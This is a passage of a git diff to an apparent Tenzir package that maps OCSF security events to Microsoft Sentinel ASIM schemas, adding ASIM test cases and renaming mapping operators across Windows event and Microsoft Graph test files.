process?.file?.name? else process?.path?.split("\\")[-1] - asim.TargetProcessCommandLine = process?.cmd_line? - asim.TargetUserId = user?.uid? - assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} - } - 1001 => { - @name = "asim.file_event" - asim.EventSchema = "FileEvent" - asim.EventSchemaVersion = "0.2.2" - match activity_name { - "Create" => { asim.EventType = "FileCreated" } - "Read" | "Open" => { asim.EventType = "FileAccessed" } - "Update" | "Set Attributes" | "Set Security" => { asim.EventType = "FileModified" } - "Delete" => { asim.EventType = "FileDeleted" } - "Rename" => { asim.EventType = "FileRenamed" } - _ => { asim.EventType = "FileCreatedOrModified" } - } - asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? - if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" - asim.ActorUsernameType = "Windows" - } - asim.ActorUserId = actor?.user?.uid? - asim.TargetFilePath = file?.path? else file?.name? - asim.TargetFileName = file?.name? else asim.TargetFilePath?.split("\\")[-1] - if activity_name == "Rename" and file_result? != null { - asim.SrcFilePath = asim.TargetFilePath - asim.SrcFileName = asim.TargetFileName - asim.SrcFilePathType = "Windows Local" if (asim.SrcFilePath?.contains("\\") else false) else "Unix Local" - asim.TargetFilePath = file_result.path? else asim.TargetFilePath - asim.TargetFileName = file_result.name? else asim.TargetFileName - } - asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local" - assert asim.ActorUsername != null and asim.TargetFilePath != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} - } - 4001 => { - @name = "asim.network_session" - asim.EventSchema = "NetworkSession" - asim.EventSchemaVersion = "0.2.7" - asim.EventType = "NetworkSession" - asim.EventType = "Flow" if activity_name == "Traffic" else asim.EventType - asim.SrcIpAddr = src_endpoint?.ip? - asim.SrcHostname = src_endpoint?.hostname? - asim.SrcPortNumber = src_endpoint?.port? - asim.DstIpAddr = dst_endpoint?.ip? - asim.DstHostname = dst_endpoint?.hostname? - asim.DstPortNumber = dst_endpoint?.port? - asim.SrcBytes = traffic?.bytes_out? - asim.DstBytes = traffic?.bytes_in? - match disposition? { - "Allowed" => { - asim.DvcAction = "Allow" - asim.EventResult = "Success" - } - "Blocked" | "Denied" => { - asim.DvcAction = "Deny" - asim.EventResult = "Failure" - asim.EventSeverity = asim.EventSeverity? else "Low" - } - _ => {} - } - } - 4002 => { - @name = "asim.web_session" - asim.EventSchema = "WebSession" - asim.EventSchemaVersion = "0.2.7" - asim.EventType = "HTTPsession" - asim.Url = http_request?.url?.url_string? - asim.HttpRequestMethod = http_request?.http_method? else activity_name?.to_upper() - asim.EventResultDetails = http_response?.code?.string() else status_code?.string() - if http_response?.code? != null { - asim.EventResult = "Success" if http_response.code < 400 else "Failure" - } - assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} - } - 4003 => { - @name = "asim.dns" - asim.EventSchema = "Dns" - asim.EventSchemaVersion = "0.1.7" - asim.EventType = query?.opcode? else "Query" - match activity_name { - "Query" => { asim.EventSubType = "request" } - "Response" => { asim.EventSubType = "response" } - _ => {} - } - asim.DnsQuery = query?.hostname? - asim.DnsQueryTypeName = query?.type? - asim.DnsQueryClassName = query?.class? - asim.EventResultDetails = rcode? else "NA" - asim.SrcIpAddr = src_endpoint?.ip? - asim.SrcHostname = src_endpoint?.hostname? - asim.DstIpAddr = dst_endpoint?.ip? - asim.DstHostname = dst_endpoint?.hostname? - assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} - } - 4004 => { - @name = "asim.dhcp_event" - asim.EventSchema = "DhcpEvent" - asim.EventSchemaVersion = "0.1.1" - match activity_name { - "Ack" | "Offer" => { asim.EventType = "Assign" } - "Request" => { asim.EventType = "Renew" } - "Release" => { asim.EventType = "Release" } - _ => { asim.EventType = "Assign" } - } - asim.SrcHostname = src_endpoint?.hostname? else src_endpoint?.ip?.string() - asim.SrcIpAddr = src_endpoint?.ip? - asim.SrcMacAddr = src_endpoint?.mac? - assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} - } - _ => { - microsoft::ocsf::asim::unsupported - } -} - -asim.AdditionalFields = {...this} -drop asim.AdditionalFields.asim -this = asim diff --git a/microsoft/package.yaml b/microsoft/package.yaml index 1f0a45e..46b3e8e 100644 --- a/microsoft/package.yaml +++ b/microsoft/package.yaml @@ -11,7 +11,8 @@ description: | telemetry and log formats. This package provides operators that parse Microsoft product logs, collect - Microsoft Graph telemetry, and map them to OCSF. The package covers native + Microsoft Graph telemetry, and map them to OCSF and Microsoft Sentinel ASIM. + The package covers native [Windows Event Log](https://learn.microsoft.com/en-us/windows/win32/wes/windows-event-log) events from the Application, Security, and System channels, and Microsoft Graph endpoints for Entra ID sign-ins and directory audits, Defender alerts @@ -20,4 +21,3 @@ description: | categories: - mappings - sources - diff --git a/microsoft/tests/asim/graph.tql b/microsoft/tests/asim/graph.tql new file mode 100644 index 0000000..70141d8 --- /dev/null +++ b/microsoft/tests/asim/graph.tql @@ -0,0 +1,11 @@ +from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { + read_json +} +@name = "microsoft.graph.sign_in" +microsoft::asim::map +name = @name +sort EventOriginalUid +select name, EventSchema, EventSchemaVersion, EventType, + EventResult, EventProduct, EventVendor, EventOriginalType, + EventOriginalUid, Dvc, SrcIpAddr=SrcIpAddr?, + TargetUsername, TargetUserId, TargetAppName=TargetAppName? diff --git a/microsoft/tests/asim/graph.txt b/microsoft/tests/asim/graph.txt new file mode 100644 index 0000000..5d5d9b8 --- /dev/null +++ b/microsoft/tests/asim/graph.txt @@ -0,0 +1,16 @@ +{ + name: "asim.authentication", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + EventResult: "Success", + EventProduct: "Microsoft Entra ID", + EventVendor: "Microsoft", + EventOriginalType: "300201", + EventOriginalUid: "sign-in-1", + Dvc: "Microsoft Entra ID", + SrcIpAddr: 203.0.113.10, + TargetUsername: "example.com\\alice", + TargetUserId: "user-1", + TargetAppName: "Office 365", +} diff --git a/microsoft/tests/asim/ocsf.tql b/microsoft/tests/asim/ocsf.tql new file mode 100644 index 0000000..c8eb719 --- /dev/null +++ b/microsoft/tests/asim/ocsf.tql @@ -0,0 +1,39 @@ +from { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + type_name: "DNS Activity: Query", + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, +} +microsoft::asim::map +name = @name +select name, EventSchema, EventSchemaVersion, EventType, + EventSubType, EventResult, EventProduct, EventVendor, + EventOriginalType, EventOriginalUid, Dvc, DnsQuery, + DnsQueryTypeName, DnsQueryClassName, EventResultDetails, + SrcIpAddr diff --git a/microsoft/tests/asim/ocsf.txt b/microsoft/tests/asim/ocsf.txt new file mode 100644 index 0000000..7b520b7 --- /dev/null +++ b/microsoft/tests/asim/ocsf.txt @@ -0,0 +1,18 @@ +{ + name: "asim.dns", + EventSchema: "Dns", + EventSchemaVersion: "0.1.7", + EventType: "Query", + EventSubType: "request", + EventResult: "Success", + EventProduct: "DNS", + EventVendor: "Microsoft", + EventOriginalType: "400301", + EventOriginalUid: "dns-1", + Dvc: "dns1", + DnsQuery: "example.org", + DnsQueryTypeName: "A", + DnsQueryClassName: "IN", + EventResultDetails: "NA", + SrcIpAddr: 10.0.0.1, +} diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql new file mode 100644 index 0000000..a6a7edd --- /dev/null +++ b/microsoft/tests/asim/windows.tql @@ -0,0 +1,10 @@ +from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { + read_all +} +microsoft::asim::map data +name = @name +select name, EventSchema, EventSchemaVersion, EventType, + EventResult, EventProduct, EventVendor, EventOriginalType, + EventOriginalUid, Dvc, DvcHostname, SrcIpAddr=SrcIpAddr?, + TargetUsername, TargetUsernameType, TargetUserId, TargetUserIdType, + LogonProtocol=LogonProtocol? diff --git a/microsoft/tests/asim/windows.txt b/microsoft/tests/asim/windows.txt new file mode 100644 index 0000000..d72b991 --- /dev/null +++ b/microsoft/tests/asim/windows.txt @@ -0,0 +1,19 @@ +{ + name: "asim.authentication", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + EventResult: "Success", + EventProduct: "Microsoft-Windows-Security-Auditing", + EventVendor: "Microsoft", + EventOriginalType: "4624", + EventOriginalUid: "98761", + Dvc: "DC01.corp.local", + DvcHostname: "DC01.corp.local", + SrcIpAddr: 10.0.0.42, + TargetUsername: "CORP\\jdoe", + TargetUsernameType: "Windows", + TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + TargetUserIdType: "SID", + LogonProtocol: "Kerberos", +} diff --git a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql index 34f5194..eda2e63 100644 --- a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql +++ b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql @@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/compliance-policy-setting-state-summari read_json } @name = "microsoft.graph.intune.compliance_policy_setting_state_summary" -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-alerts.tql b/microsoft/tests/graph/ocsf/defender-alerts.tql index c93dff5..b597953 100644 --- a/microsoft/tests/graph/ocsf/defender-alerts.tql +++ b/microsoft/tests/graph/ocsf/defender-alerts.tql @@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-alerts.ndjson" { read_json } @name = "microsoft.graph.defender.alert" -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-incidents.tql b/microsoft/tests/graph/ocsf/defender-incidents.tql index 7432c6e..d6ff2e3 100644 --- a/microsoft/tests/graph/ocsf/defender-incidents.tql +++ b/microsoft/tests/graph/ocsf/defender-incidents.tql @@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-incidents.ndjson" { read_json } @name = "microsoft.graph.defender.incident" -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast sort time, metadata.original_event_uid diff --git a/microsoft/tests/graph/ocsf/detected-apps.tql b/microsoft/tests/graph/ocsf/detected-apps.tql index 5177c7e..ef02388 100644 --- a/microsoft/tests/graph/ocsf/detected-apps.tql +++ b/microsoft/tests/graph/ocsf/detected-apps.tql @@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/detected-apps.ndjson" { read_json } @name = "microsoft.graph.intune.detected_app" -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/directory-audits.tql b/microsoft/tests/graph/ocsf/directory-audits.tql index 9d30a4e..973eafc 100644 --- a/microsoft/tests/graph/ocsf/directory-audits.tql +++ b/microsoft/tests/graph/ocsf/directory-audits.tql @@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/directory-audits.ndjson" { read_json } @name = "microsoft.graph.directory_audit" -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast sort time diff --git a/microsoft/tests/graph/ocsf/managed-devices.tql b/microsoft/tests/graph/ocsf/managed-devices.tql index 394bdd5..1524afe 100644 --- a/microsoft/tests/graph/ocsf/managed-devices.tql +++ b/microsoft/tests/graph/ocsf/managed-devices.tql @@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/managed-devices.ndjson" { read_json } @name = "microsoft.graph.intune.managed_device" -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/risk-detections.tql b/microsoft/tests/graph/ocsf/risk-detections.tql index f41f158..5fc5d4e 100644 --- a/microsoft/tests/graph/ocsf/risk-detections.tql +++ b/microsoft/tests/graph/ocsf/risk-detections.tql @@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risk-detections.ndjson" { read_json } @name = "microsoft.graph.identity_protection.risk_detection" -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/risky-users.tql b/microsoft/tests/graph/ocsf/risky-users.tql index c0247cd..8d9ac02 100644 --- a/microsoft/tests/graph/ocsf/risky-users.tql +++ b/microsoft/tests/graph/ocsf/risky-users.tql @@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risky-users.ndjson" { read_json } @name = "microsoft.graph.identity_protection.risky_user" -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/sign-ins.tql b/microsoft/tests/graph/ocsf/sign-ins.tql index 99401ba..2c86d79 100644 --- a/microsoft/tests/graph/ocsf/sign-ins.tql +++ b/microsoft/tests/graph/ocsf/sign-ins.tql @@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { read_json } @name = "microsoft.graph.sign_in" -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf-to-asim/alert.tql b/microsoft/tests/ocsf-to-asim/alert.tql index 5a96c99..cb1927d 100644 --- a/microsoft/tests/ocsf-to-asim/alert.tql +++ b/microsoft/tests/ocsf-to-asim/alert.tql @@ -51,7 +51,7 @@ from { ], } @name = "ocsf.detection_finding" -microsoft::ocsf::map_to_asim +microsoft::asim::ocsf::map name = @name select name, EventSchema, EventSchemaVersion, EventType, EventUid, EventSeverity, EventOriginalUid, EventProduct, EventVendor, AlertName, diff --git a/microsoft/tests/ocsf-to-asim/audit.tql b/microsoft/tests/ocsf-to-asim/audit.tql index d1e4325..56aad19 100644 --- a/microsoft/tests/ocsf-to-asim/audit.tql +++ b/microsoft/tests/ocsf-to-asim/audit.tql @@ -39,7 +39,7 @@ from { }, } @name = "ocsf.event_log_activity" -microsoft::ocsf::map_to_asim +microsoft::asim::ocsf::map name = @name select name, EventSchema, EventSchemaVersion, EventType, EventResult, EventSeverity, EventOriginalType, Dvc, DvcHostname, Object, ObjectType, diff --git a/microsoft/tests/ocsf-to-asim/authentication.tql b/microsoft/tests/ocsf-to-asim/authentication.tql index 2e0d03b..91d38ad 100644 --- a/microsoft/tests/ocsf-to-asim/authentication.tql +++ b/microsoft/tests/ocsf-to-asim/authentication.tql @@ -143,7 +143,7 @@ from { }, } @name = "ocsf.authentication" -microsoft::ocsf::map_to_asim +microsoft::asim::ocsf::map name = @name sort EventOriginalUid select name, EventSchema, EventSchemaVersion, EventType, diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.tql b/microsoft/tests/ocsf-to-asim/direct-targets.tql index 21ca2fa..6d4e3b4 100644 --- a/microsoft/tests/ocsf-to-asim/direct-targets.tql +++ b/microsoft/tests/ocsf-to-asim/direct-targets.tql @@ -182,7 +182,7 @@ from { code: 200, }, } -microsoft::ocsf::map_to_asim +microsoft::asim::ocsf::map name = @name sort EventOriginalUid select name, EventSchema, EventSchemaVersion, EventType, EventResult, diff --git a/microsoft/tests/ocsf-to-asim/process.tql b/microsoft/tests/ocsf-to-asim/process.tql index db7a522..caa54b3 100644 --- a/microsoft/tests/ocsf-to-asim/process.tql +++ b/microsoft/tests/ocsf-to-asim/process.tql @@ -55,7 +55,7 @@ from { }, } @name = "ocsf.process_activity" -microsoft::ocsf::map_to_asim +microsoft::asim::ocsf::map name = @name select name, EventSchema, EventSchemaVersion, EventType, EventResult, EventSeverity, EventOriginalType, DvcHostname, ActorUsername, diff --git a/microsoft/tests/ocsf-to-asim/unsupported-strict.tql b/microsoft/tests/ocsf-to-asim/unsupported-strict.tql index 1016c0b..391f957 100644 --- a/microsoft/tests/ocsf-to-asim/unsupported-strict.tql +++ b/microsoft/tests/ocsf-to-asim/unsupported-strict.tql @@ -26,5 +26,5 @@ from { } @name = "ocsf.script_activity" strict { - microsoft::ocsf::map_to_asim + microsoft::asim::ocsf::map } diff --git a/microsoft/tests/ocsf-to-asim/user-management.tql b/microsoft/tests/ocsf-to-asim/user-management.tql index a46548e..037eb44 100644 --- a/microsoft/tests/ocsf-to-asim/user-management.tql +++ b/microsoft/tests/ocsf-to-asim/user-management.tql @@ -76,7 +76,7 @@ from { }, } @name = "ocsf.account_change" -microsoft::ocsf::map_to_asim +microsoft::asim::ocsf::map name = @name sort EventOriginalType select name, EventSchema, EventSchemaVersion, EventType, EventResult, diff --git a/microsoft/tests/ocsf/eid-0100.tql b/microsoft/tests/ocsf/eid-0100.tql index db1d984..28242cd 100644 --- a/microsoft/tests/ocsf/eid-0100.tql +++ b/microsoft/tests/ocsf/eid-0100.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0100.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0101.tql b/microsoft/tests/ocsf/eid-0101.tql index e9deb9a..3371198 100644 --- a/microsoft/tests/ocsf/eid-0101.tql +++ b/microsoft/tests/ocsf/eid-0101.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0101.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0102.tql b/microsoft/tests/ocsf/eid-0102.tql index d61c1da..a18d7c4 100644 --- a/microsoft/tests/ocsf/eid-0102.tql +++ b/microsoft/tests/ocsf/eid-0102.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0102.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0106.tql b/microsoft/tests/ocsf/eid-0106.tql index 0482e94..bc298a6 100644 --- a/microsoft/tests/ocsf/eid-0106.tql +++ b/microsoft/tests/ocsf/eid-0106.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0106.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0129.tql b/microsoft/tests/ocsf/eid-0129.tql index d75ee9e..157c549 100644 --- a/microsoft/tests/ocsf/eid-0129.tql +++ b/microsoft/tests/ocsf/eid-0129.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0129.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0140.tql b/microsoft/tests/ocsf/eid-0140.tql index 6b33d23..f0f8c55 100644 --- a/microsoft/tests/ocsf/eid-0140.tql +++ b/microsoft/tests/ocsf/eid-0140.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0140.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0141.tql b/microsoft/tests/ocsf/eid-0141.tql index 35ec463..cc0c3f0 100644 --- a/microsoft/tests/ocsf/eid-0141.tql +++ b/microsoft/tests/ocsf/eid-0141.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0141.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0200.tql b/microsoft/tests/ocsf/eid-0200.tql index 84f2ea8..b005263 100644 --- a/microsoft/tests/ocsf/eid-0200.tql +++ b/microsoft/tests/ocsf/eid-0200.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0200.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0201.tql b/microsoft/tests/ocsf/eid-0201.tql index ecd335d..607df7f 100644 --- a/microsoft/tests/ocsf/eid-0201.tql +++ b/microsoft/tests/ocsf/eid-0201.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0201.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1000.tql b/microsoft/tests/ocsf/eid-1000.tql index 25270e4..7a91880 100644 --- a/microsoft/tests/ocsf/eid-1000.tql +++ b/microsoft/tests/ocsf/eid-1000.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1000.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1001.tql b/microsoft/tests/ocsf/eid-1001.tql index b6fa6b0..de919fc 100644 --- a/microsoft/tests/ocsf/eid-1001.tql +++ b/microsoft/tests/ocsf/eid-1001.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1001.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1002.tql b/microsoft/tests/ocsf/eid-1002.tql index 32eba09..8930325 100644 --- a/microsoft/tests/ocsf/eid-1002.tql +++ b/microsoft/tests/ocsf/eid-1002.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1002.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1006.tql b/microsoft/tests/ocsf/eid-1006.tql index d6c0e24..cd39dbf 100644 --- a/microsoft/tests/ocsf/eid-1006.tql +++ b/microsoft/tests/ocsf/eid-1006.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1006.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1007.tql b/microsoft/tests/ocsf/eid-1007.tql index bcd2818..429cf01 100644 --- a/microsoft/tests/ocsf/eid-1007.tql +++ b/microsoft/tests/ocsf/eid-1007.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1007.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1102.tql b/microsoft/tests/ocsf/eid-1102.tql index 35971f9..5bf1783 100644 --- a/microsoft/tests/ocsf/eid-1102.tql +++ b/microsoft/tests/ocsf/eid-1102.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1102.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1116.tql b/microsoft/tests/ocsf/eid-1116.tql index d26d3a9..c4657ce 100644 --- a/microsoft/tests/ocsf/eid-1116.tql +++ b/microsoft/tests/ocsf/eid-1116.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1116.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1117.tql b/microsoft/tests/ocsf/eid-1117.tql index 763191a..2c6ea04 100644 --- a/microsoft/tests/ocsf/eid-1117.tql +++ b/microsoft/tests/ocsf/eid-1117.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1117.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1121.tql b/microsoft/tests/ocsf/eid-1121.tql index 93b83a8..a9cd4eb 100644 --- a/microsoft/tests/ocsf/eid-1121.tql +++ b/microsoft/tests/ocsf/eid-1121.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1121.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-2000.tql b/microsoft/tests/ocsf/eid-2000.tql index a2ea9df..a6944b1 100644 --- a/microsoft/tests/ocsf/eid-2000.tql +++ b/microsoft/tests/ocsf/eid-2000.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-2000.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4100.tql b/microsoft/tests/ocsf/eid-4100.tql index 061275e..44a701f 100644 --- a/microsoft/tests/ocsf/eid-4100.tql +++ b/microsoft/tests/ocsf/eid-4100.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4100.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4103.tql b/microsoft/tests/ocsf/eid-4103.tql index 7de51dc..ab4cf96 100644 --- a/microsoft/tests/ocsf/eid-4103.tql +++ b/microsoft/tests/ocsf/eid-4103.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4103.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4104.tql b/microsoft/tests/ocsf/eid-4104.tql index 3f1dbcb..e95bc7d 100644 --- a/microsoft/tests/ocsf/eid-4104.tql +++ b/microsoft/tests/ocsf/eid-4104.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4104.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4105.tql b/microsoft/tests/ocsf/eid-4105.tql index 40c361e..e7ed9d1 100644 --- a/microsoft/tests/ocsf/eid-4105.tql +++ b/microsoft/tests/ocsf/eid-4105.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4105.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4106.tql b/microsoft/tests/ocsf/eid-4106.tql index 66c6d0e..0278912 100644 --- a/microsoft/tests/ocsf/eid-4106.tql +++ b/microsoft/tests/ocsf/eid-4106.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4106.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4624.tql b/microsoft/tests/ocsf/eid-4624.tql index c78fea6..1f5407a 100644 --- a/microsoft/tests/ocsf/eid-4624.tql +++ b/microsoft/tests/ocsf/eid-4624.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4625.tql b/microsoft/tests/ocsf/eid-4625.tql index 13870fe..9d08d78 100644 --- a/microsoft/tests/ocsf/eid-4625.tql +++ b/microsoft/tests/ocsf/eid-4625.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4625.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4648.tql b/microsoft/tests/ocsf/eid-4648.tql index 99d13fb..e9ad6ca 100644 --- a/microsoft/tests/ocsf/eid-4648.tql +++ b/microsoft/tests/ocsf/eid-4648.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4648.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4672.tql b/microsoft/tests/ocsf/eid-4672.tql index 7a4cdc0..19c7581 100644 --- a/microsoft/tests/ocsf/eid-4672.tql +++ b/microsoft/tests/ocsf/eid-4672.tql @@ -1,7 +1,7 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4672.xml" { read_all } -microsoft::windows::ocsf::map data +microsoft::ocsf::map data ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4688.tql b/microsoft/tests/ocsf/eid-4688.tql index 636ffac..38bc3e2 100644 --- a/microsoft/tests/ocsf/eid-4688.tql +++ b/microsoft/tests/ocsf/eid-4688.tql @@ -1,7 +1,7 @@ from_file 